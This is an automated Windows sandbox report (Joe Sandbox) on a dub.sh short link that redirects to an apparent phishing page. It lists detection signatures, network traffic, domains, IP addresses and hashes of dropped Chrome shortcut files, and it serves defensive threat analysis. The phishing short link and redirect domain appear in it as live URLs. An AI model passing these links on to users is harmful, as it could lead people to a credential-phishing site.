Windows Analysis Report
https://dub.sh/vu352zF

Overview

General Information

Sample URL:https://dub.sh/vu352zF
Analysis ID:1540570
Infos:

Detection

Score:48
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Yara detected obfuscated html page
Detected suspicious crossdomain redirect
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic

Classification

Classification chart (axes): Ransomware, Spreading, Phishing, Banker, Trojan / Bot, Adware, Spyware, Exploiter, Evader, Miner; scale: clean, suspicious, malicious
  • System is w10x64_ra
  • chrome.exe (PID: 5452 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 6812 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2036 --field-trial-handle=1864,i,10136855794902392152,9737319549396712890,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • chrome.exe (PID: 6428 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://dub.sh/vu352zF" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
dropped/chromecache_65 | JoeSecurity_Obshtml | Yara detected obfuscated html page | Joe Security |
dropped/chromecache_64 | JoeSecurity_Obshtml | Yara detected obfuscated html page | Joe Security |

No Sigma rule has matched

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-10-23T22:58:08.961008+0200 | 2056643 | 2 | Possible Social Engineering Attempted | 192.168.2.16 | 49704 | 192.254.233.44 | 443 | TCP

      Phishing

Source: Yara match | File source: dropped/chromecache_65, type: DROPPED
Source: Yara match | File source: dropped/chromecache_64, type: DROPPED
Source: https://aixeliedaily.com/m/ | HTTP Parser: No favicon
Source: unknown | HTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.16:49715 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.16:49716 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 20.12.23.50:443 -> 192.168.2.16:49717 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 20.12.23.50:443 -> 192.168.2.16:49718 version: TLS 1.2
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | HTTP traffic: Redirect from: dub.sh to https://aixeliedaily.com/m/
Source: Network traffic | Suricata IDS: 2056643 - Severity 2 - ET PHISHING Javascript Browser Fingerprinting POST Request : 192.168.2.16:49704 -> 192.254.233.44:443
Source: unknown | TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown | TCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknown | TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown | TCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknown | TCP traffic detected without corresponding DNS query: 20.12.23.50
Source: global traffic | HTTP traffic detected: GET /vu352zF HTTP/1.1 | Host: dub.sh | Connection: keep-alive | sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" | sec-ch-ua-mobile: ?0 | sec-ch-ua-platform: "Windows" | Upgrade-Insecure-Requests: 1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 | Sec-Fetch-Site: none | Sec-Fetch-Mode: navigate | Sec-Fetch-User: ?1 | Sec-Fetch-Dest: document | Accept-Encoding: gzip, deflate, br | Accept-Language: en-US,en;q=0.9
Source: global traffic | HTTP traffic detected: GET /m/ HTTP/1.1 | Host: aixeliedaily.com | Connection: keep-alive | Upgrade-Insecure-Requests: 1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 | Sec-Fetch-Site: none | Sec-Fetch-Mode: navigate | Sec-Fetch-User: ?1 | Sec-Fetch-Dest: document | sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" | sec-ch-ua-mobile: ?0 | sec-ch-ua-platform: "Windows" | Accept-Encoding: gzip, deflate, br | Accept-Language: en-US,en;q=0.9
Source: global traffic | HTTP traffic detected: GET /m/TYPEXXX HTTP/1.1 | Host: aixeliedaily.com | Connection: keep-alive | sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" | sec-ch-ua-mobile: ?0 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 | sec-ch-ua-platform: "Windows" | Accept: */* | Sec-Fetch-Site: same-origin | Sec-Fetch-Mode: no-cors | Sec-Fetch-Dest: script | Referer: https://aixeliedaily.com/m/ | Accept-Encoding: gzip, deflate, br | Accept-Language: en-US,en;q=0.9
Source: global traffic | HTTP traffic detected: GET /4.7.5/socket.io.min.js HTTP/1.1 | Host: cdn.socket.io | Connection: keep-alive | sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" | Origin: https://aixeliedaily.com | sec-ch-ua-mobile: ?0 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 | sec-ch-ua-platform: "Windows" | Accept: */* | Sec-Fetch-Site: cross-site | Sec-Fetch-Mode: cors | Sec-Fetch-Dest: script | Referer: https://aixeliedaily.com/ | Accept-Encoding: gzip, deflate, br | Accept-Language: en-US,en;q=0.9
Source: global traffic | HTTP traffic detected: GET /favicon.ico HTTP/1.1 | Host: aixeliedaily.com | Connection: keep-alive | sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" | sec-ch-ua-mobile: ?0 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 | sec-ch-ua-platform: "Windows" | Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8 | Sec-Fetch-Site: same-origin | Sec-Fetch-Mode: no-cors | Sec-Fetch-Dest: image | Referer: https://aixeliedaily.com/m/ | Accept-Encoding: gzip, deflate, br | Accept-Language: en-US,en;q=0.9
Source: global traffic | HTTP traffic detected: GET /4.7.5/socket.io.min.js HTTP/1.1 | Host: cdn.socket.io | Connection: keep-alive | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 | Accept: */* | Sec-Fetch-Site: none | Sec-Fetch-Mode: cors | Sec-Fetch-Dest: empty | Accept-Encoding: gzip, deflate, br | Accept-Language: en-US,en;q=0.9
Source: global traffic | HTTP traffic detected: GET /favicon.ico HTTP/1.1 | Host: aixeliedaily.com | Connection: keep-alive | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 | Accept: */* | Sec-Fetch-Site: none | Sec-Fetch-Mode: cors | Sec-Fetch-Dest: empty | Accept-Encoding: gzip, deflate, br | Accept-Language: en-US,en;q=0.9
Source: global traffic | HTTP traffic detected: GET /fs/windows/config.json HTTP/1.1 | Connection: Keep-Alive | Accept: */* | Accept-Encoding: identity | If-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMT | Range: bytes=0-2147483646 | User-Agent: Microsoft BITS/7.8 | Host: fs.microsoft.com
Source: global traffic | HTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=5Ph5S4BCaUnUfHa&MD=vlcclxBN HTTP/1.1 | Connection: Keep-Alive | Accept: */* | User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33 | Host: slscr.update.microsoft.com
Source: global traffic | HTTP traffic detected: GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=5Ph5S4BCaUnUfHa&MD=vlcclxBN HTTP/1.1 | Connection: Keep-Alive | Accept: */* | User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33 | Host: slscr.update.microsoft.com
Source: global traffic | DNS traffic detected: DNS query: dub.sh
Source: global traffic | DNS traffic detected: DNS query: aixeliedaily.com
Source: global traffic | DNS traffic detected: DNS query: www.google.com
Source: global traffic | DNS traffic detected: DNS query: cdn.socket.io
Source: unknown | HTTP traffic detected: POST /m/ HTTP/1.1 | Host: aixeliedaily.com | Connection: keep-alive | Content-Length: 138444 | Cache-Control: max-age=0 | sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" | sec-ch-ua-mobile: ?0 | sec-ch-ua-platform: "Windows" | Upgrade-Insecure-Requests: 1 | Origin: https://aixeliedaily.com | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 | Sec-Fetch-Site: same-origin | Sec-Fetch-Mode: navigate | Sec-Fetch-Dest: document | Referer: https://aixeliedaily.com/m/ | Accept-Encoding: gzip, deflate, br | Accept-Language: en-US,en;q=0.9
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Wed, 23 Oct 2024 20:58:10 GMT | Server: Apache | Expires: Wed, 11 Jan 1984 05:00:00 GMT | Cache-Control: no-cache, must-revalidate, max-age=0 | Link: <https://aixeliedaily.com/index.php/wp-json/>; rel="https://api.w.org/" | Upgrade: h2,h2c | Connection: Upgrade, close | Vary: Accept-Encoding | Transfer-Encoding: chunked | Content-Type: text/html; charset=UTF-8
Source: chromecache_62.1.dr | String found in binary or memory: https://cdn.socket.io/4.7.5/socket.io.min.js
Source: classification engine | Classification label: mal48.phis.win@18/14@12/7
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps
Source: unknown | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2036 --field-trial-handle=1864,i,10136855794902392152,9737319549396712890,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: unknown | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://dub.sh/vu352zF"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
Source: Google Drive.lnk.0.dr | LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: YouTube.lnk.0.dr | LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Sheets.lnk.0.dr | LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Gmail.lnk.0.dr | LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Slides.lnk.0.dr | LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Docs.lnk.0.dr | LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Window Recorder | Window detected: More than 3 window changes detected
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk
Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts
Execution: Windows Management Instrumentation; Scheduled Task/Job; At; Cron
Persistence: 1 Registry Run Keys / Startup Folder; Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook
Privilege Escalation: 1 Process Injection; 1 Registry Run Keys / Startup Folder; Logon Script (Windows); Login Hook
Defense Evasion: 1 Masquerading; 1 Process Injection; Obfuscated Files or Information; Binary Padding
Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS
Discovery: System Service Discovery; Application Window Discovery; Query Registry; System Network Configuration Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model
Collection: Data from Local System; Data from Removable Media; Data from Network Shared Drive; Input Capture
Command and Control: 1 Encrypted Channel; 4 Non-Application Layer Protocol; 5 Application Layer Protocol; 3 Ingress Tool Transfer
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction
[Behavior graph: ID 1540570, URL https://dub.sh/vu352zF, start date 23/10/2024, architecture WINDOWS, score 48. Signature: Yara detected obfuscated html page. chrome.exe contacted aixeliedaily.com (192.254.233.44, UNIFIEDLAYER-AS-1US, United States), www.google.com (142.250.186.68, GOOGLEUS, United States) and 4 other IPs or domains.]

No Antivirus matches

Name | IP | Active | Malicious | Antivirus Detection | Reputation
dub.sh | 76.76.21.123 | true | false | | unknown
aixeliedaily.com | 192.254.233.44 | true | false | | unknown
d2vgu95hoyrpkh.cloudfront.net | 18.245.31.33 | true | false | | unknown
www.google.com | 142.250.186.68 | true | false | | unknown
cdn.socket.io | unknown | unknown | false | | unknown

Name | Malicious | Antivirus Detection | Reputation
https://aixeliedaily.com/m/TYPEXXX | false | | unknown
https://aixeliedaily.com/favicon.ico | false | | unknown
https://aixeliedaily.com/m/ | false | | unknown
https://dub.sh/vu352zF | false | | unknown
https://cdn.socket.io/4.7.5/socket.io.min.js | false | | unknown

IP | Domain | Country | ASN | ASN Name | Malicious
142.250.186.68 | www.google.com | United States | 15169 | GOOGLEUS | false
76.76.21.123 | dub.sh | United States | 16509 | AMAZON-02US | false
18.245.31.33 | d2vgu95hoyrpkh.cloudfront.net | United States | 16509 | AMAZON-02US | false
239.255.255.250 | unknown | Reserved | unknown | unknown | false
18.245.31.5 | unknown | United States | 16509 | AMAZON-02US | false
192.254.233.44 | aixeliedaily.com | United States | 46606 | UNIFIEDLAYER-AS-1US | false

IP
192.168.2.16
                          Joe Sandbox version:41.0.0 Charoite
                          Analysis ID:1540570
                          Start date and time:2024-10-23 22:57:36 +02:00
                          Joe Sandbox product:CloudBasic
                          Overall analysis duration:0h 3m 23s
                          Hypervisor based Inspection enabled:false
                          Report type:full
                          Cookbook file name:defaultwindowsinteractivecookbook.jbs
                          Sample URL:https://dub.sh/vu352zF
                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                          Number of analysed new started processes analysed:13
                          Number of new started drivers analysed:0
                          Number of existing processes analysed:0
                          Number of existing drivers analysed:0
                          Number of injected processes analysed:0
                          Technologies:
                          • HCA enabled
                          • EGA enabled
                          • AMSI enabled
                          Analysis Mode:default
                          Analysis stop reason:Timeout
                          Detection:MAL
                          Classification:mal48.phis.win@18/14@12/7
                          EGA Information:Failed
                          HCA Information:
                          • Successful, ratio: 100%
                          • Number of executed functions: 0
                          • Number of non-executed functions: 0
                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                          • Excluded IPs from analysis (whitelisted): 142.250.186.67, 108.177.15.84, 142.250.74.206, 34.104.35.123, 199.232.214.172, 142.250.184.227, 142.250.186.142
                          • Excluded domains from analysis (whitelisted): clients1.google.com, fs.microsoft.com, clients2.google.com, accounts.google.com, edgedl.me.gvt1.com, slscr.update.microsoft.com, update.googleapis.com, ctldl.windowsupdate.com, clientservices.googleapis.com, clients.l.google.com, fe3cr.delivery.mp.microsoft.com
                          • Not all processes where analyzed, report is missing behavior information
                          • VT rate limit hit for: https://dub.sh/vu352zF
                          No simulations
                          No context
                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Oct 23 19:58:06 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                          Category:dropped
                          Size (bytes):2673
                          Entropy (8bit):3.981988447135065
                          Encrypted:false
                          SSDEEP:48:8qvOdiTuW7HMeidAKZdA1FehwiZUklqehu3y+3:8qbDAMF3y
                          MD5:02F12536E8AD552EE241B4ED0E21F484
                          SHA1:A08520EA4C245C94F257244B0E31BF233B2E6579
                          SHA-256:A85793183D027185F0B42BAC8B4E2AD82F1FBF9F274B530492ACA4320593EEA1
                          SHA-512:24C77BA9802504A13F3F3B33BA82D8C2B1ACC809E5799213F62F3D22AB2E12E33B58D600166D1E463C479CBA24278BC4A78DF856648F1502DCDA641F8EA88393
                          Malicious:false
                          Reputation:low
                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Oct 23 19:58:06 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                          Category:dropped
                          Size (bytes):2675
                          Entropy (8bit):3.9977921515677695
                          Encrypted:false
                          SSDEEP:48:8EvOdiTuW7HMeidAKZdA1seh/iZUkAQkqehV3y+2:8EbDAi9Q83y
                          MD5:6A687C07F16305E9210DA501376CF915
                          SHA1:BC7809AB010FA6B631F10011BB1699EDEEC8BEF0
                          SHA-256:60792B8F30E84D32A91BB61938EDFFFB6AF68CA9891F4FDF3F900CA56217C17F
                          SHA-512:39BE2D1474B774FFE00E9F2665599E711B70E0A19A21FA8C3CD6AC20E36DE4E8262C087CECD23A4D17D5BFABE30768456D27F4C7D6DD2A091B42970E9B75545E
                          Malicious:false
                          Reputation:low
                          Preview:L..................F.@.. ...$+.,.....p.B.%..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.IWY8.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VWYB.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VWYB.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VWYB............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VWYC............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........0.I......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Oct 6 08:05:01 2023, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                          Category:dropped
                          Size (bytes):2689
                          Entropy (8bit):4.0074237754032325
                          Encrypted:false
                          SSDEEP:48:86vOdiTuWAHMeidAKZdA14meh7sFiZUkmgqeh7s73y+BX:86bDV2nh3y
                          MD5:E8EA8D0B69DEE63C32C566927BA8BDB2
                          SHA1:26B404EA8E2A135CD9FC58D483C6061227A689F0
                          SHA-256:AB38255970312D64C2D7AB720F525792C87A48EA41CA865FE2F4EF06B50A6B1C
                          SHA-512:2F3B6401AAFCB30EA4D86604ADDF22C787A4F1D5257279DC4CC0E66B4C265B2C009C078AF68C1FBC7975C36ECD9986EE74C3BC246F3BA114F2E45F5CA10FD662
                          Malicious:false
                          Reputation:low
                          Preview:L..................F.@.. ...$+.,.....Y.04...N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.IWY8.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VWYB.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VWYB.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VWYB............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VFW.E...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........0.I......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Oct 23 19:58:06 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                          Category:dropped
                          Size (bytes):2677
                          Entropy (8bit):3.994788706660101
                          Encrypted:false
                          SSDEEP:48:8nvOdiTuW7HMeidAKZdA1TehDiZUkwqehJ3y+R:8nbDA5D3y
                          MD5:97D1751994C0F77A0DD34431C5FEE1A4
                          SHA1:354AB409C1365FE737C6ACBC37333630900644C3
                          SHA-256:5C13C03B189D9ECDD5086B5329801D01606C2B6D21BC49C2F114A1772FEE29A3
                          SHA-512:77926BB0B68C187228E67230714A7F5C9E20A2859FB577D99C1C2D18B0A944FBD7CAECFAA24F571ED7E10113157E52C5C346F26D9480381BAD866C7A55B890BF
                          Malicious:false
                          Reputation:low
                          Preview:L..................F.@.. ...$+.,.....k.B.%..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.IWY8.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VWYB.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VWYB.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VWYB............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VWYC............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........0.I......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Oct 23 19:58:06 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                          Category:dropped
                          Size (bytes):2677
                          Entropy (8bit):3.9829423970485465
                          Encrypted:false
                          SSDEEP:48:8HhvOdiTuW7HMeidAKZdA1dehBiZUk1W1qehX3y+C:8HhbDAp933y
                          MD5:0A6E0074DD9BE6BB5FABBE688FBCD814
                          SHA1:8D6142003F38933F5CEB0349505AB4457AD7F976
                          SHA-256:F37BF1CFE08DF68E2DA5B14FB6B1F6484E28EC377E7AF566D702EEF12A1954DF
                          SHA-512:B5090D74F078C1EBEF360862C46EEDE7D98E7AC72BD2D238F073030253FBFAE2ABE4723FAFA55DF1DAEB524BA235F08467BC2DB69F554E0745C32805B803D9F3
                          Malicious:false
                          Reputation:low
                          Preview:L..................F.@.. ...$+.,..../`.B.%..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.IWY8.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VWYB.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VWYB.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VWYB............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VWYC............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........0.I......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Oct 23 19:58:05 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                          Category:dropped
                          Size (bytes):2679
                          Entropy (8bit):3.9950270527739122
                          Encrypted:false
                          SSDEEP:48:8/vOdiTuW7HMeidAKZdA1duTeehOuTbbiZUk5OjqehOuTbh3y+yT+:8/bDARTfTbxWOvTbh3y7T
                          MD5:1361582E3E17993DD3A8413EB8BCB760
                          SHA1:A41E6EDC838A7E116B8228BCF2C8CC26E5A293C8
                          SHA-256:1C64112CE9593AE6E300788FDC67DA95256A6CE7DAFB69B073C3A312B045CE42
                          SHA-512:59EB502DF2B36CA0504B0D543F12B40DE345616282568D1190AD6C92B198FA7F8BBAFC7FB8ACEAFA69FF94170C8B9D5C80F67BEE039F68636E195899A87F98E9
                          Malicious:false
                          Reputation:low
